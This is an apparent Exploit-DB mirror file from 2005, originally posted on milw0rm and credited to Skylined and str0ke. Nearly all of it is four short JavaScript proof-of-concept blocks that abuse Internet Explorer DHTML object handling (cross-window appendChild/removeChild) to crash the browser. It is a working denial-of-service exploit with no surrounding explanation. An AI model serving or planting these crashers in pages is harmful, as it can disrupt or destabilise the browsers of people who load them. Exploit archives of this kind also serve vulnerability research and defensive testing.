exploit-db-mirror/platforms/windows/dos/931.html
Offensive Security de22c9ec44 DB: 2015-07-13
2015-07-13 05:02:34 +00:00

19 lines
674 B
HTML
Executable file

<!-- Here are multiple Microsoft Internet Explorer DHTML Object Handling Vulnerabilities by Skylined /str0ke -->
<SCRIPT language="javascript">
a=document.createTextNode();try{window.open().document.appendChild(a);}catch(e){}document.removeChild(a);
</SCRIPT>
<SCRIPT language="javascript">
p=document.createElement();c=window.open().document.createElement();try{c.appendChild(p);}catch(e){p.removeChild(c);};
</SCRIPT>
<SCRIPT language="javascript">
try{window.open().document.appendChild(document);}catch(e){}
</SCRIPT>
<SCRIPT>
try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>
# milw0rm.com [2005-04-12]